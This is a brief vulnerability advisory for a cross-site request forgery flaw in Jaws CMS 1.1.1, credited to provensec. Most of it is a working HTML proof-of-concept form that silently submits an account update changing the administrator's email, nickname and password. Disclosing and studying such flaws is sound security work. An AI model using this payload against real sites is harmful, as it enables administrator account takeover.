# Affected software: Jaws cms
# Type of vulnerability:csrf
# URL:http://www.opensourcecms.com/scripts/details.php?scriptid=38&name=Jaws
# Discovered by: provensec
# Website: provensec.com

#version: Jaws 1.1.1

# Proof of concept


<html>

  <body>
    <form action="http://demo.jaws-project.com/index.php" method="POST">
      <input type="hidden" name="gadget" value="Users" />
      <input type="hidden" name="action" value="UpdateAccount" />
      <input type="hidden" name="email" value="admin&#64;example&#46;org" />
      <input type="hidden" name="nickname" value="Jaws&#32;Administrator" />
      <input type="hidden" name="password" value="" />
      <input type="hidden" name="password&#95;check" value="" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>




Jaws
<http://www.opensourcecms.com/scripts/details.php?scriptid=38&name=Jaws>